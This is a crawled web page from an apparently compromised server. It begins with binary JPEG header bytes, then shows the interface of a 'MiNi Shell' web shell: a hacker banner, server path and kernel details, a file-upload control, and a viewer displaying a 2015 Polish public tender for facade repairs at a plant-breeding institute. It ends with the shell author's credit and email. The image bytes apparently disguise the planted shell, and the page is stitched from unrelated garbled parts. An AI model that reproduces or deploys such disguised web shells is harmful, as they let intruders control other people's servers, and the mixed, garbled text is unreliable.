JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151016/151687-N-2015.html

<p class="kh_header"><b>Błonie: Remont elewacji Ośrodka Szkoleniowego  Instytutu Hodowli i Aklimatyzacji Roślin-Państwowego Instytutu Badawczego w Radzikowie.</b><br>
<b>Numer ogłoszenia: 151687 - 2015; data zamieszczenia: 16.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hodowli i Aklimatyzacji Roślin , Radzików 1, 05-870 Błonie, woj. mazowieckie, tel. 22 7253611, faks 22 7254714.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihar.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowy Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont elewacji Ośrodka Szkoleniowego  Instytutu Hodowli i Aklimatyzacji Roślin-Państwowego Instytutu Badawczego w Radzikowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu elewacji budynku Ośrodka Szkoleniowego w Instytucie Hodowli i Aklimatyzacji Roślin - Państwowym Instytucie Badawczym w Radzikowie.

W zakresie prac jest wykonanie inwentaryzacji geodezyjnej powykonawczej.

Budynek Ośrodka Szkoleniowego IHAR-PIB w Radzikowie został wybudowany w technologii prefabrykowanej uprzemysłowionej, szkieletowej,  żelbetowej. Część hotelowa   jest pięciokondygnacyjna o konstrukcji szkieletowej systemowej z płytami betonowymi trójwarstwowymi, z usztywnieniami ze ścian żelbetowych monolitycznych poprzecznych i podłużnych, wysokim parterem z gazobetonu. Konstrukcję tworzą słupy jednokondygnacyjne, belki żelbetowe ryglowe oparte przegubowo na wspornikach słupów. Budynek kryty dachem pogrążonym, wentylowanym stropodachem pokrytym papą asfaltową z korytem odwadniającym .
Budynek ośrodka połączony jest parterowym łącznikiem na poziomie terenu z parterowym, niepodpiwniczonym budynkiem stołówki. Budynek wyposażony jest w dźwig osobowy obsługujący wszystkie jego kondygnacje.

Wysokość budynku  18,00m.
 
Dane wskaźnikowe:

Kubatura: 15.520 m3
Pow. zabudowy: 845 m2; 948 z tarasem;

Wysokość kondygnacji :

piwnica  - 287cm,
parter  -  420 cm
piętro I, II, III 	 - 300 cm,

Budynek wyposażony jest w instalacje sanitarne takie jak: co, wod.-kan.,  wentylację mechaniczną, wentylację grawitacyjną, c.u.w. ze stacjonarnej kotłowni gazowej, instalację p.poż - wewnętrzne hydranty z pompą podnoszącą ciśnienie oraz instalację elektryczną, oświetlenie, gniazda wtykowe, siłę, instalację odgromową, telefoniczną, monitoringu zewnętrznego oraz zbiorczą antenę radiowo- telewizyjną.

Na budynku występują wyraźne zarysowania i spękania w ścianach osłonowych oraz ubytki w wypełnieniu w połączeniach płyt osłonowych.

Stan techniczny elementów konstrukcyjnych obiektu jest dobry. W trakcie eksploatacji budynku ujawniły się wady technologiczne i wykonawcze elementów struktury ściany, tj. zbyt niska izolacyjność termiczna ścian zewnętrznych, uszkodzenia płyt ściennych, wykruszenie wypełnień na styku płyt z elementami konstrukcyjnymi budynku.  Stare, drewniane i wypaczone okna na I, II i III piętrze zostały wymienione na okna PCV jednakże w wielu przypadkach zamontowano je i wykonano obróbkę  niezgodnie ze sztuką budowlaną. Widoczna niekontrolowana infiltracja powietrza poprzez brak uszczelnień, spękanie ścian, niewłaściwą obróbkę.
Zjawiska powyższe uniemożliwiają utrzymanie mikroklimatu w pomieszczeniach budynku na pożądanym poziomie i wpływają na nieuzasadniony wzrost energochłonności  eksploatacyjnej budynku.

 Remont elewacji budynku - zakres:

a.Naprawa uszkodzonych ścian i tynków oraz wzmocnienie spękanych płyt elewacyjnych technologią Brutt Saver;
b.Docieplenie  ścian zewnętrznych budynku;
c.Wymiana okien pozostałych do wymiany wraz z likwidacją lub pomniejszeniem otworów okiennych, montaż siłowników p.poż przy istniejących drzwiach zewnętrznych w skrajnych klatkach schodowych wraz z oknami i drzwiami oddymiającymi ;
d.Montaż kratek nawiewnych w przestrzeni stropodachu;
e.Likwidacja tarasów na dachu wraz z demontażem rur spustowych na ścianie szczytowej,
f.Demontaż istniejącej balustrady tarasu i schodów oraz wykonanie naprawy tarasu i spodu płyty i biegu schodowego, montaż obróbki blacharskiej i nowej balustrady;
g.Likwidacja  betonowej opaski  wokół budynku, przestrzeń wokół budynku wyłożyć żwirem płukanym w pasie o szerokości 50 cm w obramowaniu krawężnikiem betonowym;
h.Demontaż  istniejących instalacji odgromowej, urządzeń klimatyzacyjnych i monitoringu, krat okiennych i drzwiowych.

Wszystkie prace należy wykonać zgodnie z przepisami, w tym techniczno-budowlanymi oraz zasadami wiedzy technicznej. 
Wszystkie użyte materiały budowlane powinny posiadać właściwe oznaczenia dopuszczające do obrotu i powszechnego stosowania w budownictwie. Powinny posiadać certyfikaty na znak bezpieczeństwa, wykazujący, że zapewniono zgodność z kryteriami technicznymi określonymi  na podstawie PN, aprobat technicznych oraz właściwych przepisów i dokumentów technicznych w odniesieniu do wyrobów podlegających tej certyfikacji, bądź powinny posiadać certyfikaty zgodności lub deklaracje zgodności z  PN lub aprobatę  techniczną.
Przy doborze materiałów należy kierować się wymaganiami sprecyzowanymi w dokumentacji technicznej załączonej do postępowania. Odstępstwo od tych wymagań jest możliwe po uzyskaniu zgody Inwestora oraz inspektora nadzoru inwestorskiego.
Do wykonania robót należy użyć wyłącznie materiałów gwarantujących odpowiednią jakość, o parametrach technicznych  i jakościowych odpowiadających właściwościom materiałów przyjętych w projekcie i dopuszczonych do stosowania. Przy wykonywaniu robót budowlanych należy zastosować wyroby budowlane wprowadzone do obrotu zgodnie z zasadami określonymi  w ustawie z dnia 16 kwietnia 2004 r o wyrobach budowlanych oraz w przepisach wykonawczych do tej ustawy. Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie w budownictwie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości). Roboty należy wykonywać zgodnie z zasadami sztuki budowlanej oraz obowiązującymi przepisami techniczno-budowlanymi.
Podczas realizacji robót Wykonawca umożliwi zamawiającemu kontrolę materiałów budowlanych, które będą użyte do wykonania przedmiotu zamówienia, w szczególności w zakresie ich jakości, posiadanych certyfikatów itp.

UWAGA:
W celu oszacowania wartości zamówienia Zamawiający wymaga przeprowadzenia oględzin obiektu przez Wykonawców zamierzających przystąpić do postępowania. W tym celu należy kontaktować się z kierownikiem Działu Administracyjno-Technicznego Karolem Ferenc, tel. 22 7334663, kom. 695397024.

Nazwy i kody - wg Wspólnego Słownika Zamówień Publicznych (CPV);
 
45211000-9 Roboty budowlane w zakresie budynków,
45443000-4 Roboty elewacyjne,

§ 4. Termin wykonania zamówienia
1.Roboty budowlane wchodzące w zakres prowadzonego postępowania muszą zostać wykonane w terminie: max. 60  dni kalendarzowych od daty zawarcia umowy. 
2.Miejsce realizacji prac: Instytut Hodowli i Aklimatyzacji Roślin- Państwowy Instytut Badawczy w Radzikowie, Radzików, 05-870 Błonie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9, 45.44.30.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 57 000,00 zł (słownie: pięćdziesiąt siedem tysięcy złotych 00/100);</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1  ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych ( Dz. U. z 2013 r., poz. 907 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli:
  - w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  prawidłowo wykonali, zgodnie z zasadami sztuki budowlanej, co najmniej 1 zamówienie obejmujące: remont elewacji budynku ( w tym wykonanie robót termomodernizacyjnych), o powierzchni ścian co najmniej 2000 m2 i wartości łącznej minimum brutto: 1 800 000,00 zł z podaniem rodzaju i wartości brutto wykonanych robót oraz daty i miejsca wykonania z załączeniem dowodów określających czy roboty te zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Uwaga: Wykazane roboty budowlane muszą być już definitywnie zakończone.
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1  ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych ( Dz. U. z 2013 r., poz. 907 z późn. zmianami).

Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli  Wykonawca dysponuje:

- kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, z min. 5 letnim doświadczeniem zawodowym jako kierownik budowy oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa, posiadający aktualny wpis, aktualne ubezpieczenie od odpowiedzialności cywilnej. 
  
Wykonawca musi zabezpieczyć niezbędną ilość osób zdolnych  do terminowej i zgodnej z umową realizacją zamówienia.
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:

a). posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 2 000 000,00 PLN (słownie: dwa miliony złotych 00/100). 
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca zobowiązany jest złożyć w terminie składania ofert w formie określonej w niniejszej SIWZ:
a). Podpisany i wypełniony  Formularz oferty - wg załącznika nr 1 do SIWZ;
b). Podpisane i wypełnione Kosztorysy ofertowe - (Przedmiary robót) z cenami jednostkowymi i wartością robót, stanowiącą cenę zamówienia - (Załącznik nr 9); załącznik nr 9a);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne postanowienia dla stron zawiera wzór umowy (załącznik nr 8 do SIWZ).
2.Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
	
a.zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia;
b.braku lub wady dokumentacji projektowej lub kosztorysowej;
c.zmian w dokumentacji projektowej lub kosztorysowej;
d.zmian w harmonogramie prac;
e.rezygnacji z wykonania części prac;
f.zmiany personelu kierowniczego wykonawcy;
g.waloryzacji wynagrodzenia;
h.wystąpienia siły wyższej.

3. Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych:

1)zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np. zmiana rachunku bankowego,
2)zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ihar.edu.pl/roboty_budowlane.php?news_id=82&news_page=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hodowli i Aklimatyzacji Roślin - Państwowy Instytut Badawczy 
w Radzikowie, 05-870 Błonie
Budynek Laboratorium II, p. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2015 godzina 12:00, miejsce: IHAR-PIB  Radzików, Kancelaria Ogólna, pokój nr 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com